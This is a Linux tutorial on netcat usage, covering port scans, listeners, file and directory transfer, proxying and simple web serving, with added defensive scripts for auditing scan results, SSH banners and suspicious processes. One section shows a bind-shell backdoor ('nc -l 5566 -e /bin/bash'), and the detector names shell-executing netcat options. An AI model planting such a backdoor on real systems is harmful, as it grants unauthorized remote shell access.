This comprehensive Linux guide expects that you run the following commands as the root user. If you decide to run them as a different user, ensure that the user has sudo access and that you precede each privileged command with sudo.

netcat is a feature-packed networking utility which reads and writes data across networks from the command line. netcat was written for the Nmap Project and is the culmination of the currently splintered family of Netcat incarnations.

It works similarly to the cat command, but for the network: it reads or writes data from/to the network using the TCP and UDP protocols. It is one of the most powerful networking tools available to Linux users and is often called the Swiss Army Knife of networking tools. It is most often used by networking specialists to monitor, test and send data across a network.

In this tutorial, we will show you the use of the netcat command with multiple examples.

Installing netcat Command

To install the netcat command on your Linux machine, run the command for your distribution:

On Debian Based Systems

root@codesposts:~$ apt install netcat

On Red-Hat Based Systems Or CentOS

root@codesposts:~$ yum install nmap-ncat

General Syntax

The general syntax of netcat is as follows:

root@codesposts:~$ netcat [options] host port
OR
root@codesposts:~$ ncat [options] host port
OR
root@codesposts:~$ nc [options] host port

Using netcat For Port Scanning

netcat is most commonly used for port scanning. You can scan a single port, multiple ports or a range of ports. Use the option -z to only check whether ports are open without sending any data, and the option -v to get more detailed output.

root@codesposts:~$ nc -z -v 155.138.206.18 80

Warning: forward host lookup failed for 155.138.206.18.vultr.com: No address associated with name
155.138.206.18.vultr.com [155.138.206.18] 80 (http) open

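If you want to display only the open ports, you can filter the output through the grep command. The -v messages are written to standard error, so redirect it into the pipe with 2>&1. The word to match depends on the netcat variant: the OpenBSD version prints "succeeded", while the traditional version prints "open" as in the output above.

root@codesposts:~$ nc -z -v 155.138.206.18 80-300 2>&1 | grep succeeded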
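The following is an added example, not part of the original guide: it extracts the open port numbers from either output style and reports any that are missing from an allow-list, which is useful when auditing your own hosts. The function names and the sample scan lines are constructed for illustration.

```bash
# Constructed sample of `nc -z -v host ports 2>&1` output in the two
# common styles (OpenBSD nc and traditional netcat). Not a real scan.
sample_scan() {
cat <<'EOF'
Connection to 192.0.2.10 22 port [tcp/ssh] succeeded!
nc: connect to 192.0.2.10 port 23 (tcp) failed: Connection refused
Connection to 192.0.2.10 25 port [tcp/smtp] succeeded!
(UNKNOWN) [192.0.2.10] 80 (http) open
(UNKNOWN) [192.0.2.10] 81 (?) : Connection refused
EOF
}

# Read scan output on stdin, print one open port per line (sorted, unique).
open_ports() {
  awk '
    # OpenBSD style: the port is the field just before the word "port".
    /succeeded!$/ { for (i = 2; i <= NF; i++) if ($i == "port") print $(i-1) }
    # Traditional style: "... PORT (service) open".
    / open$/      { print $(NF-2) }
  ' | sort -n -u
}

# Read scan output on stdin, print open ports that are NOT in the
# space-separated allow-list given as the first argument.
unexpected_ports() {
  allowed=" $1 "
  open_ports | while read -r p; do
    case $allowed in
      *" $p "*) ;;          # expected service, stay quiet
      *) echo "$p" ;;       # open but not on the allow-list
    esac
  done
}

# Demo on the constructed sample: only ssh and http are expected here.
# On a real host: nc -z -v HOST 1-1024 2>&1 | unexpected_ports "22 80"
sample_scan | unexpected_ports "22 80"
```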

Listening To Inbound Connections

You can also use this command to listen for inbound connections to your system by using the option -l with a specific port to listen on.

root@codesposts:~$ nc -l port

root@codesposts:~$ nc -l 8080

Connecting To A System Remotely

You can connect to another system remotely using this command. You can run the command like below

root@codesposts:~$ nc IP_Address Port

root@codesposts:~$ nc 192.168.1.1 80

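Checking Server Software And Its Version

You can also use the netcat command to find the server software and its version. An SSH server sends its identification string as soon as the connection opens; sending the “EXIT” command to the server on the default SSH port 22 simply makes it answer “Protocol mismatch.” and close the connection, like below: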

root@codesposts:~$ echo "EXIT" | nc 155.138.206.18 22

SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6
Protocol mismatch.
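The following is an added example, not part of the original guide: it splits the captured identification string into its fields (the layout `SSH-protoversion-softwareversion SP comments` is defined in RFC 4253, section 4.2), which is handy when inventorying which SSH versions your own servers expose. The function names are hypothetical and the sample capture is constructed from the output shown above.

```bash
# Constructed capture: the two lines the server returned in the example above.
sample_capture() {
  printf 'SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6\r\nProtocol mismatch.\n'
}

# Read nc output on stdin and print the fields of the first SSH
# identification string found. Returns 1 if there is none.
parse_ssh_banner() {
  # Strip carriage returns, then keep only the first line that looks like
  # "SSH-<proto>-<software>[ <comments>]".
  banner=$(tr -d '\r' | sed -n '/^SSH-[^-]*-/{p;q;}')
  [ -n "$banner" ] || {
    echo "no SSH identification string found" >&2
    return 1
  }
  rest=${banner#SSH-}              # "2.0-OpenSSH_7.4p1 Debian-10+deb9u6"
  proto=${rest%%-*}                # text before the first "-"
  sw_and_comment=${rest#*-}        # text after the first "-"
  software=${sw_and_comment%% *}   # up to the first space
  case $sw_and_comment in
    *" "*) comment=${sw_and_comment#* } ;;  # optional comments field
    *)     comment="" ;;
  esac
  printf 'proto=%s software=%s comment=%s\n' "$proto" "$software" "$comment"
}

# Demo on the constructed capture.
# Against a server: echo "EXIT" | nc HOST 22 | parse_ssh_banner
sample_capture | parse_ssh_banner
```

The comments field is where distribution builds put their package revision, so it tells an observer the patch level as well as the OpenSSH release.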

Chatting With A Remote System

You can also use netcat command to make a chat system between one host and another. First, you need to set up a host to listen through a specific port. Then you need to connect to that host using that port on your system.

From Server side

root@codesposts:~$ nc -l 4444

From Client Side

root@codesposts:~$ nc server-IP 4444

Replace “server-IP” with the IP of the host that is listening for an inbound connection.

Once the connection is established, you can start sending messages to the server. Those messages will be displayed on the terminal of the server.

Sending/Receiving Files

You can also use netcat command to send or receive files from one host to another. For this, you first need to start the listener on the system on which the file is to be received.

root@codesposts:~$ nc -l 4444 > file.txt

Now, you can send the file from the other host using this port by running the command like this

root@codesposts:~$ nc host-IP 4444 < file.txt

Replace the “host-IP” with the IP of the host that is listening for the file to be received.

Sending/Receiving Directory

If you want to send a directory using netcat command, you first need to make an archive of that directory using tar command and then send it over using the netcat command.

root@codesposts:~$ tar czvf - /path/to/directory | nc host-IP 4444

Then you can receive the file and extract it using the command like this

root@codesposts:~$ nc -l 4444 | tar xzvf -

Using netcat As Proxy

You can also use netcat command as a proxy for your system.

root@codesposts:~$ nc -l 4444 | nc 192.168.100.1 40

Now all the connections coming to our server on port 4444 will be automatically redirected to the 192.168.100.1 server on port 40. But since we are using a pipe, data can only be transferred in one direction. To be able to receive the data back, we need to create a two-way pipe. Use the following commands to do so:

root@codesposts:~$ mkfifo 2way
root@codesposts:~$ nc -l 4444 0<2way | nc 192.168.100.1 40 1>2way

After this command, you will be able to send and receive data over the proxy.

Using UDP Ports

If you want to scan UDP ports, you can just add the option -u with the command

root@codesposts:~$ nc -u -z -v 192.168.100.1 80-200

192.168.100.1: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.100.1] 200 (?) open
(UNKNOWN) [192.168.100.1] 199 (smux) open
(UNKNOWN) [192.168.100.1] 198 (?) open
(UNKNOWN) [192.168.100.1] 197 (?) open
(UNKNOWN) [192.168.100.1] 196 (?) open
(UNKNOWN) [192.168.100.1] 195 (?) open
(UNKNOWN) [192.168.100.1] 194 (irc) open

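Similarly, you can add this option to any netcat command to use it on UDP ports. Keep in mind that UDP is connectionless: netcat reports a UDP port as open whenever no ICMP "port unreachable" reply comes back, so a filtered port also shows as open and results like the ones above should be treated as unconfirmed.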

Creating A Backdoor Using netcat Command

You can also use netcat command to create a backdoor. This functionality is mostly used by hackers. You can run the command like this:

root@codesposts:~$ nc -l 5566 -e /bin/bash

The -e flag attaches a bash shell to port 5566. A client that connects to port 5566 on the server then has complete access to the system through bash, by running the command like this:

root@codesposts:~$ nc 192.168.100.1 5566
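The following is an added example, not part of the original guide: a check that flags netcat processes started with a program-execution option such as the `-e` listener above, for use when reviewing your own systems. The function names are hypothetical and the process list is constructed; hits need manual review, since option letters differ between netcat variants.

```bash
# Constructed sample in `ps -eo pid,user,args` format (header removed).
# Not taken from a real host.
sample_ps() {
cat <<'EOF'
  812 root     /usr/sbin/sshd -D
 2291 www-data nc -l 5566 -e /bin/bash
 2310 alice    nc -l 4444
 2377 bob      ncat -lk 8080 --sh-exec /usr/local/bin/echo-service
 2402 carol    grep -e nc /var/log/syslog
 2450 dave     /bin/nc.traditional -lvp 9001 -c /bin/sh
EOF
}

# Read a process list on stdin and print "pid user command" for every
# nc/ncat/netcat process whose arguments include -e, -c, --exec or
# --sh-exec (short options may be bundled, e.g. -lve).
find_nc_exec() {
  awk '{
    # Compare only the basename of the executable, so /bin/nc matches too.
    n = split($3, path, "/"); bin = path[n]
    if (bin !~ /^(nc|ncat|netcat)(\.(traditional|openbsd))?$/) next
    for (i = 4; i <= NF; i++)
      if ($i ~ /^--(sh-)?exec$/ || $i ~ /^--(sh-)?exec=/ ||
          $i ~ /^-[A-Za-z0-9]*[ec]$/) {
        cmd = $3
        for (j = 4; j <= NF; j++) cmd = cmd " " $j
        print $1, $2, cmd
        next
      }
  }'
}

# Demo on the constructed sample.
# On a live system: ps -eo pid,user,args --no-headers | find_nc_exec
sample_ps | find_nc_exec
```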

Running A Web Server With A Static Page Using netcat

You can also start a web server using the netcat command on a local host that serves a static web page “sample.html”.

First, make a new file with the name “sample.html” and copy the following code into the file.

<html>
        <head>
                <title>Test Page</title>
        </head>
        <body>
                <h1>Level 1 header</h1>
                <h2>Subheading</h2>
                <p>Normal text here</p>
        </body>
</html>

Then run the following command:

root@codesposts:~$ while true; do sudo nc -lp 80 < sample.html; done

After this, you can access the page by going to “http://server-IP.com/sample.html”

Setting The Connection Timeout

If we run the command in the listener mode, it will continue infinitely and will have to be terminated manually. But we can set up a timeout for a connection by using the option -w with the netcat command.

root@codesposts:~$ nc -w 10 192.168.100.1 4444

Making The Server Persistent

The server will terminate automatically when the client disconnects from it. To make the server keep listening for more connections even after a client disconnects, you can use the option -k with the netcat command.

root@codesposts:~$ nc -l -k 4444

Performing HTTP Request

You can also use this command to send various HTTP requests to a remote server.

For example, if you want to retrieve the netcat man page from the OpenBSD web site, run this command:

root@codesposts:~$ printf "GET /nc.1 HTTP/1.1\r\nHost: man.openbsd.org\r\n\r\n" | nc man.openbsd.org 80